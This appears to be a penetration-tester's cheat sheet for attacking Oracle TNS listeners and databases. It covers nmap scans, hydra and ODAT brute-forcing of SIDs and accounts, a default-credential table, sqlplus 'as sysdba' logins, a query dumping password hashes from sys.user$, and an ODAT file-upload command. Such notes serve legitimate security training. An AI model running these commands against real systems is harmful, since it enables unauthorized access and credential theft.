PRIMARY CATEGORY → PROTOCOLS AND SERVICES
| REFERENCES | |
|---|---|
| Oracle Pentesting Best Practices | See here |
| Pentesters Guide to Oracle Hacking | See here |
| Looking into methods to penetrate OracleDB | See here |
| SQLPlus Commands | See here |
Oracle TNS → Oracle Transparent Network Substrate
It is a network protocol that Oracle uses for communication between clients and servers
The TNS-Listener is a Oracle Service that usually resides on the default port → 1521
Its main task is to accept connections from clients and connect them to a specific database via an instance
- Oracle Database
Is a Relational Database Management System (RDBMS) from the Oracle Corporation
The first step regarding Oracle Enumeration is always to interact with the Oracle TNS Service
Configuration Files
| File | Description |
|---|---|
listener.ora | Listener configuration, including ports and related databases |
tnsnames.ora | Contains the necessary information for clients to connect to the service |
Ports
- 1521 → TNS-Listener
It is the default port where Oracle TNS listens to map incoming connnections to the corresponding instance in order to interact with the associated database
Service Scanning
Nmap
nmap -p1521 -sC -sV -T5 -n -Pn --disable-arp-ping <TARGET>Oracle TNS Version
NSE Script →
oracle-tns-version
nmap -1521 -sV --script oracle-tns-version -T5 -n -Pn --disable-arp-ping <TARGET>TNS Listener Bruteforce
An error may arise when trying to connect to the Oracle TNS, this may be due to an incompatibility with the TNS Version or because the listener is password protected
If the latter, then proceed as follows →
hydra -P <PASSWORD_WORDLIST> -t <THREADS> -s <PORT> <TARGET> oracle-listenerSID Enumeration
The SID or System Identifier is a unique identifier of a Oracle Instance in a server
INFO
Note that, an instance, is a set of in-memory processes that interact with the information stored in a database
As a client, to connect to a specific database on a Oracle Server , It is necessary to indicate the SID that identifies the instance associated with the database
If no SID can be accessed or none is known, then SID Bruteforce is required
SID Bruteforce
Odat.py
SIDGuesser Module
odat.py sidguesser -s <TARGET>To use a Specific SID Dictionary
odat.py sidguesser --sids-file <SID_WORDLIST> Nmap
nmap -p1521 --script oracle-sid-brute -n -Pn --disable-arp-ping <TARGET>Wordlist →
/usr/share/nmap/nselib/data/oracle-sids
Hydra
hydra -L <SID_WORDLIST> -s <PORT> <TARGET> oracle-sidWordlist →
/usr/share/metasploit-framework/data/wordlists/sid.txt
Targeting Accounts
Once a valid SID is obtained, we can try to connect to the TN-Listener to brute-force the credentials of the user accounts or simply to get valid users
Default Credentials
| Username | Password |
|---|---|
DBSNMP | DBSNMP |
SYS | CHANGE_ON_INSTALL |
pcms_sys | pcms_sys |
WMSYS | WMSYS |
OUTLN | OUTLN |
SCOTT | TIGGER |
Accounts Bruteforce
Odat.py
PasswordGuesser Module
Default Wordlist →
accounts/accounts.txt
odat.py passwordguesser -s <TARGET> -p <PORT> -d <SID>To use a Specific Oracle Credentials Wordlist
odat.py passwordguesser -s <TARGET> -p <PORT> -d <SID> --accounts-file <WORDLIST>Connection to a Remote Database
SQLPlus
Or just download the .rpm packages from here and use
aliento convert them to .deb if necessary
Login with Valid Credentials
sqlplus <USERNAME>/<PASSWORD>@<TARGET>/<SID>Login w Valid Creds - Non Default Port
sqlplus <USERNAME>/<PASSWORD>@<TARGET>:<PORT>/<SID>Database Account Impersonation
Log in to the Oracle Database with sysdba/sysop privileges
To attempt to log in to a specific Oracle instance as a privileged account with non-privileged user credentials →
- Sysdba
sqlplus <USERNAME>/<PASSWORD>@<TARGET>/<SID> 'as sysdba'- Sysop
sqlplus <USERNAME>/<PASSWORD>@<TARGET>/<SID> 'as sysop'Oracle Commands
List All Tables of the Current Database
> select table_name from all_tables;Show the Current User Privileges
> select * from user_role_privs;List All Existing Database Users
> select name, password from sys.user$;Odat.py All In One
First, ODAT will search for a valid SID
If it finds at least one SID, then it will search for valid Oracle Accounts for each SID found
For each existent account of each valid instance (Oracle SID) , ODAT will extract the attack or privesc vectors of the found accounts
Full Enumeration
odat.py all -s <TARGET> -p <PORT>Bruteforce Accounts for a Specific SID
odat.py all -s <TARGET> -p <PORT> -d <SID>File Upload
Odat.py
odat.py utlfile -s <TARGET> -d <SID> -U <USERNAME> -P <PASSWORD> --sysdba --putfile <REMOTE_PATH> <REMOTE_FILE> <LOCAL_FILE>